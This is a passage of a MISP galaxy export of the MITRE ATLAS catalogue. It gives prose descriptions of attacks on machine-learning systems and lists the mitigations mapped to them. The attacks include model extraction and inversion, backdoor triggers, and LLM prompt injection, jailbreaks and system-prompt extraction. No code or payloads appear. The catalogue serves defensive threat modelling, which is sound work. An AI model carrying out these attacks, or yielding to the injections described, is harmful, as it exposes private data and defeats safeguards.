Adversaries may exfiltrate private information via [ML Model Inference API Access](https://atlas.mitre.org/techniques/AML.T0040). ML Models have been shown leak private information about their training data (e.g. [Infer Training Data Membership](https://atlas.mitre.org/techniques/AML.T0024.000), [Invert ML Model](https://atlas.mitre.org/techniques/AML.T0024.001)). The model itself may also be extracted ([Extract ML Model](https://atlas.mitre.org/techniques/AML.T0024.002)) for the purposes of [ML Intellectual Property Theft](https://atlas.mitre.org/techniques/AML.T0048.004).

Exfiltration of information relating to private training data raises privacy concerns. Private training data may include personally identifiable information, or other protected data.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Exfiltration via ML Inference API"

Table 5259. Table References

Links

https://atlas.mitre.org/techniques/AML.T0024

Infer Training Data Membership

Adversaries may infer the membership of a data sample in its training set, which raises privacy concerns. Some strategies make use of a shadow model that could be obtained via [Train Proxy via Replication](https://atlas.mitre.org/techniques/AML.T0005.001), others use statistics of model prediction scores.

This can cause the victim model to leak private information, such as PII of those in the training set or other forms of protected IP.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Infer Training Data Membership"

Table 5260. Table References

Links

https://atlas.mitre.org/techniques/AML.T0024.000

Invert ML Model

Machine learning models' training data could be reconstructed by exploiting the confidence scores that are available via an inference API. By querying the inference API strategically, adversaries can back out potentially private information embedded within the training data. This could lead to privacy violations if the attacker can reconstruct the data of sensitive features used in the algorithm.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Invert ML Model"

Table 5261. Table References

Links

https://atlas.mitre.org/techniques/AML.T0024.001

Extract ML Model

Adversaries may extract a functional copy of a private model. By repeatedly querying the victim’s [ML Model Inference API Access](https://atlas.mitre.org/techniques/AML.T0040), the adversary can collect the target model’s inferences into a dataset. The inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model.

Adversaries may extract the model to avoid paying per query in a machine learning as a service setting. Model extraction is used for [ML Intellectual Property Theft](https://atlas.mitre.org/techniques/AML.T0048.004).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Extract ML Model"

Table 5262. Table References

Links

https://atlas.mitre.org/techniques/AML.T0024.002

Exfiltration via Cyber Means

Adversaries may exfiltrate ML artifacts or other information relevant to their goals via traditional cyber means.

See the ATT&CK [Exfiltration](https://attack.mitre.org/tactics/TA0010/) tactic for more information.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Exfiltration via Cyber Means"

Table 5263. Table References

Links

https://atlas.mitre.org/techniques/AML.T0025

Denial of ML Service

Adversaries may target machine learning systems with a flood of requests for the purpose of degrading or shutting down the service. Since many machine learning systems require significant amounts of specialized compute, they are often expensive bottlenecks that can become overloaded. Adversaries can intentionally craft inputs that require heavy amounts of useless compute from the machine learning system.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Denial of ML Service"

Table 5264. Table References

Links

https://atlas.mitre.org/techniques/AML.T0029

Erode ML Model Integrity

Adversaries may degrade the target model’s performance with adversarial data inputs to erode confidence in the system over time. This can lead to the victim organization wasting time and money both attempting to fix the system and performing the tasks it was meant to automate by hand.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Erode ML Model Integrity"

Table 5265. Table References

Links

https://atlas.mitre.org/techniques/AML.T0031

Cost Harvesting

Adversaries may target different machine learning services to send useless queries or computationally expensive inputs to increase the cost of running services at the victim organization. Sponge examples are a particular type of adversarial data designed to maximize energy consumption and thus operating cost.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Cost Harvesting"

Table 5266. Table References

Links

https://atlas.mitre.org/techniques/AML.T0034

ML Artifact Collection

Adversaries may collect ML artifacts for [Exfiltration](https://atlas.mitre.org/tactics/AML.TA0010) or for use in [ML Attack Staging](https://atlas.mitre.org/tactics/AML.TA0001). ML artifacts include models and datasets as well as other telemetry data produced when interacting with a model.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="ML Artifact Collection"

Table 5267. Table References

Links

https://atlas.mitre.org/techniques/AML.T0035

Data from Information Repositories

Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.

Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include Sharepoint, Confluence, and enterprise databases such as SQL Server.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Data from Information Repositories"

Table 5268. Table References

Links

https://atlas.mitre.org/techniques/AML.T0036

Data from Local System

Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.

This can include basic fingerprinting information and sensitive data such as ssh keys.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Data from Local System"

Table 5269. Table References

Links

https://atlas.mitre.org/techniques/AML.T0037

ML Model Inference API Access

Adversaries may gain access to a model via legitimate access to the inference API. Inference API access can be a source of information to the adversary ([Discover ML Model Ontology](https://atlas.mitre.org/techniques/AML.T0013), [Discover ML Model Family](https://atlas.mitre.org/techniques/AML.T0014)), a means of staging the attack ([Verify Attack](https://atlas.mitre.org/techniques/AML.T0042), [Craft Adversarial Data](https://atlas.mitre.org/techniques/AML.T0043)), or for introducing data to the target system for Impact ([Evade ML Model](https://atlas.mitre.org/techniques/AML.T0015), [Erode ML Model Integrity](https://atlas.mitre.org/techniques/AML.T0031)).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="ML Model Inference API Access"

Table 5270. Table References

Links

https://atlas.mitre.org/techniques/AML.T0040

Physical Environment Access

In addition to the attacks that take place purely in the digital domain, adversaries may also exploit the physical environment for their attacks. If the model is interacting with data collected from the real world in some way, the adversary can influence the model through access to wherever the data is being collected. By modifying the data in the collection process, the adversary can perform modified versions of attacks designed for digital access.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Physical Environment Access"

Table 5271. Table References

Links

https://atlas.mitre.org/techniques/AML.T0041

Verify Attack

Adversaries can verify the efficacy of their attack via an inference API or access to an offline copy of the target model. This gives the adversary confidence that their approach works and allows them to carry out the attack at a later time of their choosing. The adversary may verify the attack once but use it against many edge devices running copies of the target model. The adversary may verify their attack digitally, then deploy it in the [Physical Environment Access](https://atlas.mitre.org/techniques/AML.T0041) at a later time. Verifying the attack may be hard to detect since the adversary can use a minimal number of queries or an offline copy of the model.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Verify Attack"

Table 5272. Table References

Links

https://atlas.mitre.org/techniques/AML.T0042

Craft Adversarial Data

Adversarial data are inputs to a machine learning model that have been modified such that they cause the adversary’s desired effect in the target model. Effects can range from misclassification, to missed detections, to maximising energy consumption. Typically, the modification is constrained in magnitude or location so that a human still perceives the data as if it were unmodified, but human perceptibility may not always be a concern depending on the adversary’s intended effect. For example, an adversarial input for an image classification task is an image the machine learning model would misclassify, but a human would still recognize as containing the correct class.

Depending on the adversary’s knowledge of and access to the target model, the adversary may use different classes of algorithms to develop the adversarial example such as [White-Box Optimization](https://atlas.mitre.org/techniques/AML.T0043.000), [Black-Box Optimization](https://atlas.mitre.org/techniques/AML.T0043.001), [Black-Box Transfer](https://atlas.mitre.org/techniques/AML.T0043.002), or [Manual Modification](https://atlas.mitre.org/techniques/AML.T0043.003).

The adversary may [Verify Attack](https://atlas.mitre.org/techniques/AML.T0042) their approach works if they have white-box or inference API access to the model. This allows the adversary to gain confidence their attack is effective "live" environment where their attack may be noticed. They can then use the attack at a later time to accomplish their goals. An adversary may optimize adversarial examples for [Evade ML Model](https://atlas.mitre.org/techniques/AML.T0015), or to [Erode ML Model Integrity](https://atlas.mitre.org/techniques/AML.T0031).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Craft Adversarial Data"

Table 5273. Table References

Links

https://atlas.mitre.org/techniques/AML.T0043

White-Box Optimization

In White-Box Optimization, the adversary has full access to the target model and optimizes the adversarial example directly. Adversarial examples trained in this manor are most effective against the target model.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="White-Box Optimization"

Table 5274. Table References

Links

https://atlas.mitre.org/techniques/AML.T0043.000

Black-Box Optimization

In Black-Box attacks, the adversary has black-box (i.e. [ML Model Inference API Access](https://atlas.mitre.org/techniques/AML.T0040) via API access) access to the target model. With black-box attacks, the adversary may be using an API that the victim is monitoring. These attacks are generally less effective and require more inferences than [White-Box Optimization](https://atlas.mitre.org/techniques/AML.T0043.000) attacks, but they require much less access.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Black-Box Optimization"

Table 5275. Table References

Links

https://atlas.mitre.org/techniques/AML.T0043.001

Black-Box Transfer

In Black-Box Transfer attacks, the adversary uses one or more proxy models (trained via [Create Proxy ML Model](https://atlas.mitre.org/techniques/AML.T0005) or [Train Proxy via Replication](https://atlas.mitre.org/techniques/AML.T0005.001)) models they have full access to and are representative of the target model. The adversary uses [White-Box Optimization](https://atlas.mitre.org/techniques/AML.T0043.000) on the proxy models to generate adversarial examples. If the set of proxy models are close enough to the target model, the adversarial example should generalize from one to another. This means that an attack that works for the proxy models will likely then work for the target model. If the adversary has [ML Model Inference API Access](https://atlas.mitre.org/techniques/AML.T0040), they may use this [Verify Attack](https://atlas.mitre.org/techniques/AML.T0042) that the attack is working and incorporate that information into their training process.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Black-Box Transfer"

Table 5276. Table References

Links

https://atlas.mitre.org/techniques/AML.T0043.002

Manual Modification

Adversaries may manually modify the input data to craft adversarial data. They may use their knowledge of the target model to modify parts of the data they suspect helps the model in performing its task. The adversary may use trial and error until they are able to verify they have a working adversarial input.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Manual Modification"

Table 5277. Table References

Links

https://atlas.mitre.org/techniques/AML.T0043.003

Insert Backdoor Trigger

The adversary may add a perceptual trigger into inference data. The trigger may be imperceptible or non-obvious to humans. This technique is used in conjunction with [Poison ML Model](https://atlas.mitre.org/techniques/AML.T0018.000) and allows the adversary to produce their desired effect in the target model.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Insert Backdoor Trigger"

Table 5278. Table References

Links

https://atlas.mitre.org/techniques/AML.T0043.004

Full ML Model Access

Adversaries may gain full "white-box" access to a machine learning model. This means the adversary has complete knowledge of the model architecture, its parameters, and class ontology. They may exfiltrate the model to [Craft Adversarial Data](https://atlas.mitre.org/techniques/AML.T0043) and [Verify Attack](https://atlas.mitre.org/techniques/AML.T0042) in an offline where it is hard to detect their behavior.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Full ML Model Access"

Table 5279. Table References

Links

https://atlas.mitre.org/techniques/AML.T0044

Spamming ML System with Chaff Data

Adversaries may spam the machine learning system with chaff data that causes increase in the number of detections. This can cause analysts at the victim organization to waste time reviewing and correcting incorrect inferences.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Spamming ML System with Chaff Data"

Table 5280. Table References

Links

https://atlas.mitre.org/techniques/AML.T0046

ML-Enabled Product or Service

Adversaries may use a product or service that uses machine learning under the hood to gain access to the underlying machine learning model. This type of indirect model access may reveal details of the ML model or its inferences in logs or metadata.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="ML-Enabled Product or Service"

Table 5281. Table References

Links

https://atlas.mitre.org/techniques/AML.T0047

External Harms

Adversaries may abuse their access to a victim system and use its resources or capabilities to further their goals by causing harms external to that system. These harms could affect the organization (e.g. Financial Harm, Reputational Harm), its users (e.g. User Harm), or the general public (e.g. Societal Harm).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="External Harms"

Table 5282. Table References

Links

https://atlas.mitre.org/techniques/AML.T0048

Financial Harm

Financial harm involves the loss of wealth, property, or other monetary assets due to theft, fraud or forgery, or pressure to provide financial resources to the adversary.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Financial Harm"

Table 5283. Table References

Links

https://atlas.mitre.org/techniques/AML.T0048.000

Reputational Harm

Reputational harm involves a degradation of public perception and trust in organizations. Examples of reputation-harming incidents include scandals or false impersonations.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Reputational Harm"

Table 5284. Table References

Links

https://atlas.mitre.org/techniques/AML.T0048.001

Societal Harm

Societal harms might generate harmful outcomes that reach either the general public or specific vulnerable groups such as the exposure of children to vulgar content.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Societal Harm"

Table 5285. Table References

Links

https://atlas.mitre.org/techniques/AML.T0048.002

User Harm

User harms may encompass a variety of harm types including financial and reputational that are directed at or felt by individual victims of the attack rather than at the organization level.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="User Harm"

Table 5286. Table References

Links

https://atlas.mitre.org/techniques/AML.T0048.003

ML Intellectual Property Theft

Adversaries may exfiltrate ML artifacts to steal intellectual property and cause economic harm to the victim organization.

Proprietary training data is costly to collect and annotate and may be a target for [Exfiltration](https://atlas.mitre.org/tactics/AML.TA0010) and theft.

MLaaS providers charge for use of their API. An adversary who has stolen a model via [Exfiltration](https://atlas.mitre.org/tactics/AML.TA0010) or via [Extract ML Model](https://atlas.mitre.org/techniques/AML.T0024.002) now has unlimited use of that service without paying the owner of the intellectual property.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="ML Intellectual Property Theft"

Table 5287. Table References

Links

https://atlas.mitre.org/techniques/AML.T0048.004

Exploit Public-Facing Application

Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Exploit Public-Facing Application"

Table 5288. Table References

Links

https://atlas.mitre.org/techniques/AML.T0049

Command and Scripting Interpreter

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.

There are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript and Visual Basic.

Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various Remote Services in order to achieve remote Execution.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Command and Scripting Interpreter"

Table 5289. Table References

Links

https://atlas.mitre.org/techniques/AML.T0050

LLM Prompt Injection

An adversary may craft malicious prompts as inputs to an LLM that cause the LLM to act in unintended ways. These "prompt injections" are often designed to cause the model to ignore aspects of its original instructions and follow the adversary’s instructions instead.

Prompt Injections can be an initial access vector to the LLM that provides the adversary with a foothold to carry out other steps in their operation. They may be designed to bypass defenses in the LLM, or allow the adversary to issue privileged commands. The effects of a prompt injection can persist throughout an interactive session with an LLM.

Malicious prompts may be injected directly by the adversary ([Direct](https://atlas.mitre.org/techniques/AML.T0051.000)) either to leverage the LLM to generate harmful content or to gain a foothold on the system and lead to further effects. Prompts may also be injected indirectly when as part of its normal operation the LLM ingests the malicious prompt from another data source ([Indirect](https://atlas.mitre.org/techniques/AML.T0051.001)). This type of injection can be used by the adversary to a foothold on the system or to target the user of the LLM.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="LLM Prompt Injection"

Table 5290. Table References

Links

https://atlas.mitre.org/techniques/AML.T0051

Direct

An adversary may inject prompts directly as a user of the LLM. This type of injection may be used by the adversary to gain a foothold in the system or to misuse the LLM itself, as for example to generate harmful content.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Direct"

Table 5291. Table References

Links

https://atlas.mitre.org/techniques/AML.T0051.000

Indirect

An adversary may inject prompts indirectly via separate data channel ingested by the LLM such as include text or multimedia pulled from databases or websites. These malicious prompts may be hidden or obfuscated from the user. This type of injection may be used by the adversary to gain a foothold in the system or to target an unwitting user of the system.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Indirect"

Table 5292. Table References

Links

https://atlas.mitre.org/techniques/AML.T0051.001

Phishing

Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.

Generative AI, including LLMs that generate synthetic text, visual deepfakes of faces, and audio deepfakes of speech, is enabling adversaries to scale targeted phishing campaigns. LLMs can interact with users via text conversations and can be programmed with a meta prompt to phish for sensitive information. Deepfakes can be use in impersonation as an aid to phishing.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Phishing"

Table 5293. Table References

Links

https://atlas.mitre.org/techniques/AML.T0052

Spearphishing via Social Engineering LLM

Adversaries may turn LLMs into targeted social engineers. LLMs are capable of interacting with users via text conversations. They can be instructed by an adversary to seek sensitive information from a user and act as effective social engineers. They can be targeted towards particular personas defined by the adversary. This allows adversaries to scale spearphishing efforts and target individuals to reveal private information such as credentials to privileged systems.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Spearphishing via Social Engineering LLM"

Table 5294. Table References

Links

https://atlas.mitre.org/techniques/AML.T0052.000

LLM Plugin Compromise

Adversaries may use their access to an LLM that is part of a larger system to compromise connected plugins. LLMs are often connected to other services or resources via plugins to increase their capabilities. Plugins may include integrations with other applications, access to public or private data sources, and the ability to execute code.

This may allow adversaries to execute API calls to integrated applications or plugins, providing the adversary with increased privileges on the system. Adversaries may take advantage of connected data sources to retrieve sensitive information. They may also use an LLM integrated with a command or script interpreter to execute arbitrary instructions.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="LLM Plugin Compromise"

Table 5295. Table References

Links

https://atlas.mitre.org/techniques/AML.T0053

LLM Jailbreak

An adversary may use a carefully crafted [LLM Prompt Injection](https://atlas.mitre.org/techniques/AML.T0051) designed to place LLM in a state in which it will freely respond to any user input, bypassing any controls, restrictions, or guardrails placed on the LLM. Once successfully jailbroken, the LLM can be used in unintended ways by the adversary.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="LLM Jailbreak"

Table 5296. Table References

Links

https://atlas.mitre.org/techniques/AML.T0054

Unsecured Credentials

Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. bash history), environment variables, operating system or application-specific repositories (e.g. Credentials in Registry), or other specialized files/artifacts (e.g. private keys).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Unsecured Credentials"

Table 5297. Table References

Links

https://atlas.mitre.org/techniques/AML.T0055

LLM Meta Prompt Extraction

An adversary may induce an LLM to reveal its initial instructions, or "meta prompt." Discovering the meta prompt can inform the adversary about the internal workings of the system. Prompt engineering is an emerging field that requires expertise and exfiltrating the meta prompt can prompt in order to steal valuable intellectual property.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="LLM Meta Prompt Extraction"

Table 5298. Table References

Links

https://atlas.mitre.org/techniques/AML.T0056

LLM Data Leakage

Adversaries may craft prompts that induce the LLM to leak sensitive information. This can include private user data or proprietary information. The leaked information may come from proprietary training data, data sources the LLM is connected to, or information from other users of the LLM.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="LLM Data Leakage"

Table 5299. Table References

Links

https://atlas.mitre.org/techniques/AML.T0057

MITRE ATLAS Course of Action

MITRE ATLAS Mitigation - Adversarial Threat Landscape for Artificial-Intelligence Systems.

MITRE ATLAS Course of Action is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Limit Release of Public Information

Limit the public release of technical information about the machine learning stack used in an organization’s products or services. Technical knowledge of how machine learning is used can be leveraged by adversaries to perform targeting and tailor attacks to the target system. Additionally, consider limiting the release of organizational information - including physical locations, researcher names, and department structures - from which technical details such as machine learning techniques, model architectures, or datasets may be inferred.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Limit Release of Public Information"

Limit Release of Public Information has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Search for Victim’s Publicly Available Research Materials" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Search Victim-Owned Websites" with estimative-language:likelihood-probability="almost-certain"

Table 5300. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0000

Limit Model Artifact Release

Limit public release of technical project details including data, algorithms, model architectures, and model checkpoints that are used in production, or that are representative of those used in production.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Limit Model Artifact Release"

Limit Model Artifact Release has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Models" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Poison Training Data" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Datasets" with estimative-language:likelihood-probability="almost-certain"

Table 5301. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0001

Passive ML Output Obfuscation

Decreasing the fidelity of model outputs provided to the end user can reduce an adversaries ability to extract information about the model and optimize attacks for the model.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Passive ML Output Obfuscation"

Passive ML Output Obfuscation has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Invert ML Model" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Discover ML Model Ontology" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Black-Box Optimization" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Infer Training Data Membership" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Discover ML Model Family" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Extract ML Model" with estimative-language:likelihood-probability="almost-certain"

Table 5302. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0002

Model Hardening

Use techniques to make machine learning models robust to adversarial inputs such as adversarial training or network distillation.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Model Hardening"

Model Hardening has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Erode ML Model Integrity" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Evade ML Model" with estimative-language:likelihood-probability="almost-certain"

Table 5303. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0003

Restrict Number of ML Model Queries

Limit the total number and rate of queries a user can perform.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Restrict Number of ML Model Queries"

Restrict Number of ML Model Queries has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Denial of ML Service" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Spamming ML System with Chaff Data" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Exfiltration via ML Inference API" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Invert ML Model" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Discover ML Model Ontology" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Black-Box Optimization" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Infer Training Data Membership" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Discover ML Model Family" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Extract ML Model" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Cost Harvesting" with estimative-language:likelihood-probability="almost-certain"

Table 5304. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0004

Control Access to ML Models and Data at Rest

Establish access controls on internal model registries and limit internal access to production models. Limit access to training data only to approved users.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Control Access to ML Models and Data at Rest"

Control Access to ML Models and Data at Rest has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="ML Intellectual Property Theft" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Model" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Exfiltration via Cyber Means" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Data" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Inject Payload" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Poison Training Data" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Poison ML Model" with estimative-language:likelihood-probability="almost-certain"

Table 5305. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0005

Use Ensemble Methods

Use an ensemble of models for inference to increase robustness to adversarial inputs. Some attacks may effectively evade one model or model family but be ineffective against others.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Use Ensemble Methods"

Use Ensemble Methods has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Model" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="ML Software" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Discover ML Model Family" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Erode ML Model Integrity" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Evade ML Model" with estimative-language:likelihood-probability="almost-certain"

Table 5306. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0006

Sanitize Training Data

Detect and remove or remediate poisoned training data. Training data should be sanitized prior to model training and recurrently for an active learning model.

Implement a filter to limit ingested training data. Establish a content policy that would remove unwanted content such as certain explicit or offensive language from being used.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Sanitize Training Data"

Sanitize Training Data has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Data" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Poison Training Data" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Poison ML Model" with estimative-language:likelihood-probability="almost-certain"

Table 5307. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0007

Validate ML Model

Validate that machine learning models perform as intended by testing for backdoor triggers or adversarial bias.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Validate ML Model"

Validate ML Model has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Model" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Inject Payload" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Poison ML Model" with estimative-language:likelihood-probability="almost-certain"

Table 5308. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0008

Use Multi-Modal Sensors

Incorporate multiple sensors to integrate varying perspectives and modalities to avoid a single point of failure susceptible to physical attacks.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Use Multi-Modal Sensors"

Use Multi-Modal Sensors has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Evade ML Model" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Physical Environment Access" with estimative-language:likelihood-probability="almost-certain"

Table 5309. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0009

Input Restoration

Preprocess all inference data to nullify or reverse potential adversarial perturbations.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Input Restoration"

Input Restoration has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Black-Box Optimization" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Erode ML Model Integrity" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Evade ML Model" with estimative-language:likelihood-probability="almost-certain"

Table 5310. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0010

Restrict Library Loading

Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.

File formats such as pickle files that are commonly used to store machine learning models can contain exploits that allow for loading of malicious libraries.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Restrict Library Loading"

Restrict Library Loading has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Unsafe ML Artifacts" with estimative-language:likelihood-probability="almost-certain"

Table 5311. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0011

Encrypt Sensitive Information

Encrypt sensitive data such as ML models to protect against adversaries attempting to access sensitive data.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Encrypt Sensitive Information"

Encrypt Sensitive Information has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="ML Intellectual Property Theft" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Discover ML Artifacts" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="ML Artifact Collection" with estimative-language:likelihood-probability="almost-certain"

Table 5312. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0012

Code Signing

